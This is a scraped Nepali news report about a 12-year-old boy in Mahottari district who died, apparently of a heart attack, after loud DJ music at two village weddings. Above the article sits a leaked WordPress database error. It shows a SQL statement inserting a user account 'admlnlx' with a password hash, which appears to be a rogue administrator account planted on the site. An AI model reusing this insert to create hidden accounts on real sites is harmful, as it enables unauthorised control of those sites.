WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bdg0UWLu/zdPrncIwAr8lIMddrOlLv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 00:12:59', '', 'admlnlx', 'admlnlx')
गौशाला, माघ २६ –
महोत्तरी जिल्लाको सुगा गाउँमा डिजे बाजाका कारण एक किशोरको मृत्यु भएको छ । मृत्यु हुनेमा जलेश्वर नगरपालिका–१५ का १२ वर्षीय अमिरुल अन्सारी रहेको परिवारजनले जनाएको छ ।
सोमबार राति गाउँमा दुईवटा बिहेमा ठूलो आवाजमा डिजे बाजा बजाएर नाचगान गरिरहेको बेला सोही नाचगान हेर्न घरबाहिर निस्केका किशोर अन्सारीको चर्को आवाजले हृदयघात भएर मृत्यु भएको चिकित्कसले बताएका छन् ।
डिजे बाजाको चर्को आवाज सुनेर बेहोस भई घर अगाडि लडेका किशोर अन्सारीलाई उपचारका लागि जिल्ला सदरमुकाम जलेश्वरस्थित शान्ति कम्युनिटी अस्पतालमा लैजाँदै गर्दा उनको बाटोमै मृत्यु भएको थियो ।